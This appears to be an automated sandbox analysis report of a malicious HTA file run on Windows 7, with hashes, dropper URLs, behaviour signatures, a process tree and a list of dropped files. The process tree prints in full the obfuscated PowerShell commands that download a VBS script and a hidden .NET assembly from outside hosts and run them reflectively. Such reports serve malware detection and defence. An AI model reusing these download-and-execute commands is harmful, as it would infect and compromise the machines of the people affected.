Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 15:46

General

  • Target

    seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta

  • Size

    178KB

  • MD5

    2d71e3e87e2ea2945dcc2571b74fdb43

  • SHA1

    a338df9a850b1c37528e1b517786285c216cf5e0

  • SHA256

    0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4

  • SHA512

    8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab

  • SSDEEP

    96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\SysWOW64\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe
      "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2260
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2940
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fexbibux.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2784
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA17E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA17D.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2884
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:264
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2232

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESA17E.tmp

    Filesize

    1KB

    MD5

    090e2756f30f05d628d0404c12d0d9ac

    SHA1

    788370e7e95d426da3f8d44ed177c03a4012c13c

    SHA256

    0c6a2b7c9b3babe897c4c152d91c3ba5f49661875711fdbbeed712d808c97a4e

    SHA512

    7607e92c3c8c1ceaeab166f76baa09ce85de1beca0774308f466d98e4c776ecef28ea2c0c684cc1bb26bbc2efcfea7aa4be70ec89c0af8cab53960e62f568304

  • C:\Users\Admin\AppData\Local\Temp\fexbibux.dll

    Filesize

    3KB

    MD5

    09065167a09041676e71db4968b9fda9

    SHA1

    2435647a46468ff5630c75d84baf109c3bf4eed2

    SHA256

    32e5de5d40534325af5e82890e829ddbc95b94f7d3b1d8f547790421499f13b5

    SHA512

    e9eecd7d6425db92e025fdd3e5b159afa221984e93780ed62d8d96ce48acf1794a9d4b171aca834ca4725863b4ca10b697b7fdff2f99f2c4519a0645678d8311

  • C:\Users\Admin\AppData\Local\Temp\fexbibux.pdb

    Filesize

    7KB

    MD5

    bd231449a7a05adcb5af8368b08b06f8

    SHA1

    edb992fd6ec96f52b7efe47799764b8b9f755637

    SHA256

    d5d75040d5e4d2ca68441790405a38535b331bc5785526b80bd7f664d64400bc

    SHA512

    7f37e73b4e65ed4a522495683e7f3d23672f865b48ae0f2f044ff63889f68f4cd5621d359ef2f597d6c48ec65ca789c255b12f6697789d8837ec98aa03be35e1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    38a4148e152f67fe3b972faadc8d3343

    SHA1

    64c93a103905724d710ddc4cfbf8facaa48fbe76

    SHA256

    6110e74076ae1be3d491598db54ebbafc6f6b072fefdca466ec6997bcd2fda8a

    SHA512

    1558c17288eca3575c5c18de79099627fe193db6634b86c64087d2dd9d1877a1cf038deafdfc44b15a11100be836b64ce641c3307a4d016ff84a73ef3e58b76b

  • C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS

    Filesize

    137KB

    MD5

    c9b675b1514c024221535d4bde6f6c69

    SHA1

    24594969bc105aec0e15f109872193c030c0c102

    SHA256

    e58ba960c159e99a12d4c50d3fffe4a9ee2b50f08e702bc90d4e18b7aa9421fb

    SHA512

    328e530eb7abb045624d793faf89ccc1a16e0c1a1c58e3a33d2cb4bd955742d511f3b07d183423a7643a57579cdd0591d968640d106fad5d1c6a4b1ad4c494d8

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCA17D.tmp

    Filesize

    652B

    MD5

    699106e500a36ccb47ba48dd3638ae5b

    SHA1

    5e6e88d7ed71a537a8616b63aef321fc4081f17f

    SHA256

    dc916bca8415d80f4ef3565a998f6d323703b803f7f88465ce61d9a7a46a46a3

    SHA512

    8e543684173d41d92885698cc51f0cf85f2c0166a385db2cf5f8292781121392f25da0466259af1cadf31be6081908e9e716c55d799b5e783af556f2908e7a31

  • \??\c:\Users\Admin\AppData\Local\Temp\fexbibux.0.cs

    Filesize

    480B

    MD5

    c66e77d41af1843e35b6467cc2482922

    SHA1

    f224cac3dd486ac45f0debd3ec7343bb3150d1d3

    SHA256

    c9d35df0658d18e1f5a467fe8aacc3da8baff1681fc5b95efbc7b4325df1595d

    SHA512

    7c3bc95eb54636a65790070923b7fcb41cac1cb38570d2803448c36ce7048cb920f03a6c33db48237b4a317795d4c4895b97091fee12e947efb1d7547c4a1c4b

  • \??\c:\Users\Admin\AppData\Local\Temp\fexbibux.cmdline

    Filesize

    309B

    MD5

    71864f07a1d2974f1915647f8757d0b7

    SHA1

    a82890133f52305b427e3fccef279444b807507f

    SHA256

    84dfa77a8a80960caefc042a81099a3a3c5c89a1e0d98a64c7d5a86ba115594f

    SHA512

    58bae1c6ee7742853d72a7ec534c21fd54aa9d04854f85fb03aba52bc6624d405d21618cf388ca95cca4fbac342e07fe3dab71366a7524be55a3c3109a02c189